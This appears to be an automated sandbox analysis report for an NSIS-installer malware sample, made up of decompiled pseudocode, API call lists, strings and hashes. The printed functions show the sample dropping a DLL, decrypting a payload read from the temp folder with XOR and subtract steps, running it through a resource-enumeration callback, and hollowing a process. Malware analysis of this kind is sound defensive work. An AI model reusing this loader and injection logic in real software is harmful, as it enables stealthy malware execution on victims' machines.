						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031DA( *0x423eb4 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x41e52
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4;
						if( *0x423eb4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x0
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x1531
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}































                  0x00402c69
                  0x00402c6c
                  0x00402c86
                  0x00402c8b
                  0x00402c9e
                  0x00402ca3
                  0x00402ca9
                  0x00000000
                  0x00402cab
                  0x00402cbc
                  0x00402ccd
                  0x00402cd4
                  0x00402cda
                  0x00402cdc
                  0x00402ce1
                  0x00402ce3
                  0x00402dd3
                  0x00402dd5
                  0x00402dda
                  0x00402de1
                  0x00000000
                  0x00000000
                  0x00402de7
                  0x00402dea
                  0x00402e16
                  0x00402e1b
                  0x00402e26
                  0x00402e28
                  0x00402e39
                  0x00402e54
                  0x00402e5a
                  0x00402e5d
                  0x00402e62
                  0x00402e81
                  0x00402e91
                  0x00402ea3
                  0x00402ea8
                  0x00402ead
                  0x00402eb0
                  0x00402eb9
                  0x00402ebd
                  0x00402ec5
                  0x00402eca
                  0x00402ecc
                  0x00402ecc
                  0x00402ecc
                  0x00402ed4
                  0x00402ed4
                  0x00402ed7
                  0x00402ed8
                  0x00402ed8
                  0x00402edb
                  0x00402edd
                  0x00402edd
                  0x00402edd
                  0x00402ee0
                  0x00402ee7
                  0x00402ef3
                  0x00402ef8
                  0x00000000
                  0x00402ef8
                  0x00000000
                  0x00402eb0
                  0x00000000
                  0x00402e64
                  0x00402df2
                  0x00402dfd
                  0x00402e02
                  0x00402e04
                  0x00000000
                  0x00000000
                  0x00402e0d
                  0x00402e10
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402ce9
                  0x00402ce9
                  0x00402cee
                  0x00402cf2
                  0x00402cf9
                  0x00402cfe
                  0x00402d00
                  0x00402d02
                  0x00402d02
                  0x00402d0a
                  0x00402d0f
                  0x00402d11
                  0x00402e70
                  0x00402eb2
                  0x00000000
                  0x00402eb2
                  0x00402d17
                  0x00402d1d
                  0x00402d9d
                  0x00402da1
                  0x00402da4
                  0x00402da9
                  0x00000000
                  0x00402da1
                  0x00402d2a
                  0x00402d2f
                  0x00402d32
                  0x00402d37
                  0x00000000
                  0x00000000
                  0x00402d39
                  0x00402d40
                  0x00000000
                  0x00000000
                  0x00402d42
                  0x00402d49
                  0x00000000
                  0x00000000
                  0x00402d4b
                  0x00402d52
                  0x00000000
                  0x00000000
                  0x00402d54
                  0x00402d5b
                  0x00000000
                  0x00000000
                  0x00402d5d
                  0x00402d63
                  0x00402d6c
                  0x00402d72
                  0x00402d75
                  0x00402d77
                  0x00402d7d
                  0x00000000
                  0x00000000
                  0x00402d83
                  0x00402d87
                  0x00402d8f
                  0x00402d8f
                  0x00402d92
                  0x00402d95
                  0x00402d97
                  0x00402d99
                  0x00402d99
                  0x00000000
                  0x00402d97
                  0x00402d89
                  0x00402d8d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402daa
                  0x00402daa
                  0x00402db0
                  0x00402dc0
                  0x00402dc0
                  0x00402dc3
                  0x00402dc9
                  0x00402dcb
                  0x00402dcb
                  0x00000000
                  0x00402ce9

                  APIs
                  • GetTickCount.KERNEL32 ref: 00402C6F
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\kVijllv0Yl.exe,00000400), ref: 00402C8B
                    • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\kVijllv0Yl.exe,80000000,00000003), ref: 00405760
                    • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                  • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\kVijllv0Yl.exe,C:\Users\user\Desktop\kVijllv0Yl.exe,80000000,00000003), ref: 00402CD4
                  • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                  Strings
                  • "C:\Users\user\Desktop\kVijllv0Yl.exe" , xrefs: 00402C68
                  • soft, xrefs: 00402D4B
                  • Null, xrefs: 00402D54
                  • C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
                  • Inst, xrefs: 00402D42
                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                  • C:\Users\user\Desktop\kVijllv0Yl.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                  • Error launching installer, xrefs: 00402CAB
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                  • String ID: "C:\Users\user\Desktop\kVijllv0Yl.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\kVijllv0Yl.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                  • API String ID: 2803837635-1694646312
                  • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                  • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                  • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                  • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401734 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 328 401778-40177e call 405ce3 322->328 323->328 333 401783-401787 328->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 343 4017a5-4017b7 334->343 344 401795-4017a3 CompareFileTime 334->344 336 4017c5-4017e1 call 40575c 335->336 337 4017bf-4017c0 call 40573d 335->337 345 4017e3-4017e6 336->345 346 401859-401882 call 404e23 call 402f01 336->346 337->336 343->335 344->343 347 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->347 348 40183b-401845 call 404e23 345->348 360 401884-401888 346->360 361 40188a-401896 SetFileTime 346->361 347->333 380 401830-401831 347->380 358 40184e-401854 348->358 363 402886 358->363 360->361 362 40189c-4018a7 FindCloseChangeNotification 360->362 361->362 366 40287d-402880 362->366 367 4018ad-4018b0 362->367 365 402888-40288c 363->365 366->363 369 4018b2-4018c3 call 405aa7 lstrcatA 367->369 370 4018c5-4018c8 call 405aa7 367->370 377 4018cd-402205 call 405346 369->377 370->377 377->365 384 40264e-402655 377->384 380->358 382 401833-401834 380->382 382->348 384->366
                  C-Code - Quality: 75%
                  			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\engineer\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\engineer\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}
















                  0x00401734
                  0x0040173b
                  0x00401744
                  0x00401747
                  0x0040174a
                  0x0040174f
                  0x00401757
                  0x00401773
                  0x00401759
                  0x00401759
                  0x0040175a
                  0x0040175a
                  0x00401779
                  0x00401783
                  0x00401783
                  0x00401787
                  0x0040178a
                  0x0040178f
                  0x00401791
                  0x00401793
                  0x00401798
                  0x00401798
                  0x004017a3
                  0x004017a3
                  0x004017b4
                  0x004017b6
                  0x004017b6
                  0x004017b7
                  0x004017b7
                  0x004017ba
                  0x004017bd
                  0x004017c0
                  0x004017c0
                  0x004017c7
                  0x004017d6
                  0x004017db
                  0x004017de
                  0x004017e1
                  0x00000000
                  0x00000000
                  0x004017e3
                  0x004017e6
                  0x00401840
                  0x00401845
                  0x004015a8
                  0x0040264e
                  0x0040264e
                  0x0040287d
                  0x00402880
                  0x00402880
                  0x00000000
                  0x004017e8
                  0x004017ee
                  0x004017f9
                  0x00401806
                  0x00401811
                  0x00401827
                  0x00401827
                  0x0040182a
                  0x00000000
                  0x00401830
                  0x00401830
                  0x00401831
                  0x0040184e
                  0x00402886
                  0x00402886
                  0x00402886
                  0x00401833
                  0x00401833
                  0x00401834
                  0x00401492
                  0x00402200
                  0x00402200
                  0x00402200
                  0x00401831
                  0x0040182a
                  0x00402888
                  0x0040288c
                  0x0040288c
                  0x0040185e
                  0x00401863
                  0x00401871
                  0x00401876
                  0x0040187c
                  0x00401880
                  0x00401882
                  0x0040188a
                  0x00401896
                  0x00401884
                  0x00401884
                  0x00401888
                  0x00000000
                  0x00000000
                  0x00401888
                  0x0040189f
                  0x004018a5
                  0x004018a7
                  0x00000000
                  0x004018ad
                  0x004018ad
                  0x004018b0
                  0x004018c8
                  0x004018b2
                  0x004018b5
                  0x004018be
                  0x004018be
                  0x004018cd
                  0x004018d2
                  0x004021fb
                  0x00000000
                  0x004021fb
                  0x00000000

                  APIs
                  • lstrcatA.KERNEL32(00000000,00000000,mcchdhqnu,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                  • CompareFileTime.KERNEL32(-00000014,?,mcchdhqnu,mcchdhqnu,00000000,00000000,mcchdhqnu,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                    • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                    • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                    • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsg69F4.tmp$C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll$mcchdhqnu
                  • API String ID: 1941528284-4160001213
                  • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                  • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                  • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                  • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021B109C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 385 21b109c-21b114a call 21b06c7 call 21b0776 * 7 402 21b114d-21b1151 385->402 403 21b1169-21b1176 402->403 404 21b1153-21b1167 402->404 405 21b1179-21b117d 403->405 404->402 406 21b117f-21b1193 405->406 407 21b1195-21b11b1 405->407 406->405 409 21b11bb-21b11e5 CreateProcessW 407->409 410 21b11b3-21b11b6 407->410 413 21b11ef-21b1208 GetThreadContext 409->413 414 21b11e7-21b11ea 409->414 411 21b135e-21b1361 410->411 415 21b120a-21b120d 413->415 416 21b1212-21b122c ReadProcessMemory 413->416 414->411 415->411 417 21b122e-21b1231 416->417 418 21b1236-21b123f 416->418 417->411 419 21b1269-21b1289 VirtualAllocEx 418->419 420 21b1241-21b1250 418->420 422 21b128b-21b128e 419->422 423 21b1293-21b12ab call 21b0267 419->423 420->419 421 21b1252-21b1258 call 21b0368 420->421 426 21b125d-21b125f 421->426 422->411 429 21b12ad-21b12b0 423->429 430 21b12b5-21b12b9 423->430 426->419 428 21b1261-21b1264 426->428 428->411 429->411 431 21b12c2-21b12cc 430->431 432 21b12ce-21b12fc call 21b0267 431->432 433 21b1303-21b131f call 21b0267 431->433 436 21b1301 432->436 439 21b1321-21b1324 433->439 440 21b1326-21b1344 SetThreadContext 433->440 436->431 439->411 441 21b134b-21b134e call 21b01b6 440->441 442 21b1346-21b1349 440->442 444 21b1353-21b1355 441->444 442->411 445 21b135c 444->445 446 21b1357-21b135a 444->446 445->411 446->411
                  APIs
                  • CreateProcessW.KERNELBASE(?,00000000), ref: 021B11E0
                  • GetThreadContext.KERNELBASE(?,00010007), ref: 021B1203
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: ContextCreateProcessThread
                  • String ID: D
                  • API String ID: 2843130473-2746444292
                  • Opcode ID: af8e008d8f2d723ba368ec0f7b572a00a24864ff06e9a32261ca2f6c9622e257
                  • Instruction ID: b0913f69d2fab415386f3ece4fa3439b7a4b2d7ec15afbfffe6cb95552aed6e5
                  • Opcode Fuzzy Hash: af8e008d8f2d723ba368ec0f7b572a00a24864ff06e9a32261ca2f6c9622e257
                  • Instruction Fuzzy Hash: 28A1D171E80209EFDB55DFA4C990BEEBBB9BF08344F1144A5E519EB260E731AA41CF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 735E1000 Relevance: 10.6, APIs: 7, Instructions: 116memoryfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E735E1000(void* __edx) {
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				long _v32;
				short _v1072;
				short _t19;
				short _t20;
				short _t21;
				short _t22;
				short _t23;
				short _t24;
				short _t25;
				short _t26;
				void* _t28;
				void* _t36;
				_Unknown_base(*)()* _t38;
				int _t41;
				long _t53;
				short _t54;
				void* _t57;
				_Unknown_base(*)()* _t63;
				long _t65;
				void* _t67;

				_t54 = 0x75;
				_t19 = 0x79;
				_v26 = _t19;
				_t65 = 0x17d78400;
				_t20 = 0x61;
				_v24 = _t20;
				_t21 = 0x73;
				_v20 = _t21;
				_t22 = 0x63;
				_v18 = _t22;
				_t23 = 0x72;
				_v16 = _t23;
				_t24 = 0x6f;
				_v14 = _t24;
				_t25 = 0x70;
				_v12 = _t25;
				_t26 = 0x71;
				_v10 = _t26;
				_v28 = _t54;
				_v22 = _t54;
				_v8 = 0;
				_t28 = VirtualAlloc(0, 0x17d78400, 0x3000, 4); // executed
				if(_t28 == 0) {
					return 0;
				} else {
					do {
						 *_t28 = 0;
						_t28 = _t28 + 1;
						_t65 = _t65 - 1;
					} while (_t65 != 0);
					GetTempPathW(0x103,  &_v1072);
					E735E4C95( &_v1072,  &_v28);
					_t36 = CreateFileW( &_v1072, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t67 = _t36;
					_t53 = GetFileSize(_t67, 0);
					_t38 = VirtualAlloc(0, _t53, 0x3000, 0x40); // executed
					_t63 = _t38;
					ReadFile(_t67, _t63, _t53,  &_v32, 0); // executed
					_t57 = 0;
					if(_t53 != 0) {
						do {
							 *((char*)(_t57 + _t63)) = ((( *((intOrPtr*)(_t57 + _t63)) + 0x00000001 ^ 0x0000009b) - 0x0000003b ^ 0x00000085) - 0x00000056 ^ 0x00000006) - 0x53;
							_t57 = _t57 + 1;
						} while (_t57 < _t53);
					}
					_t41 = EnumResourceTypesA(0, _t63, 0); // executed
					return _t41;
				}
			}


































                  0x735e100e
                  0x735e1011
                  0x735e1014
                  0x735e1018
                  0x735e101d
                  0x735e1020
                  0x735e1026
                  0x735e1029
                  0x735e102d
                  0x735e1036
                  0x735e103a
                  0x735e103d
                  0x735e1041
                  0x735e1044
                  0x735e1048
                  0x735e104b
                  0x735e104f
                  0x735e1057
                  0x735e105f
                  0x735e1063
                  0x735e1067
                  0x735e106b
                  0x735e106f
                  0x735e4c94
                  0x735e1075
                  0x735e1075
                  0x735e1075
                  0x735e1077
                  0x735e1078
                  0x735e1078
                  0x735e1089
                  0x735e109a
                  0x735e10b8
                  0x735e10be
                  0x735e10cf
                  0x735e10d4
                  0x735e10d8
                  0x735e10e1
                  0x735e10e7
                  0x735e10eb
                  0x735e10ed
                  0x735e10fe
                  0x735e1101
                  0x735e1102
                  0x735e10ed
                  0x735e110b
                  0x735e1117
                  0x735e1117

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 735E106B
                  • GetTempPathW.KERNEL32(00000103,?), ref: 735E1089
                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 735E10B8
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 735E10C2
                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 735E10D4
                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 735E10E1
                  • EnumResourceTypesA.KERNEL32 ref: 735E110B
                  Memory Dump Source
                  • Source File: 00000000.00000002.361811622.00000000735E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 735E0000, based on PE: true
                  • Associated: 00000000.00000002.361802453.00000000735E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000000.00000002.361822810.00000000735E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_735e0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$AllocVirtual$CreateEnumPathReadResourceSizeTempTypes
                  • String ID:
                  • API String ID: 2006121276-0
                  • Opcode ID: 0ee06f84e94349a929d64fc308d8c730fddf2d600c3a157b9be70473c733fb8d
                  • Instruction ID: 8499286cbe66cc6ed5bebb856729d8f4c19082b06fd9043a378719e76afb281c
                  • Opcode Fuzzy Hash: 0ee06f84e94349a929d64fc308d8c730fddf2d600c3a157b9be70473c733fb8d
                  • Instruction Fuzzy Hash: 8931C162A883497AFB109AF1AC56FBF673CEF44B11F104456F708EF1C0D1A15A4683A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402F01 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 505 402f01-402f10 506 402f12-402f28 SetFilePointer 505->506 507 402f2e-402f39 call 40302c 505->507 506->507 510 403025-403029 507->510 511 402f3f-402f59 ReadFile 507->511 512 403022 511->512 513 402f5f-402f62 511->513 514 403024 512->514 513->512 515 402f68-402f7b call 40302c 513->515 514->510 515->510 518 402f81-402f84 515->518 519 402ff1-402ff7 518->519 520 402f86-402f89 518->520 523 402ff9 519->523 524 402ffc-40300f ReadFile 519->524 521 40301d-403020 520->521 522 402f8f 520->522 521->510 526 402f94-402f9c 522->526 523->524 524->512 525 403011-40301a 524->525 525->521 527 402fa1-402fb3 ReadFile 526->527 528 402f9e 526->528 527->512 529 402fb5-402fb8 527->529 528->527 529->512 530 402fba-402fcf WriteFile 529->530 531 402fd1-402fd4 530->531 532 402fed-402fef 530->532 531->532 533 402fd6-402fe9 531->533 532->514 533->526 534 402feb 533->534 534->521
                  C-Code - Quality: 93%
                  			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
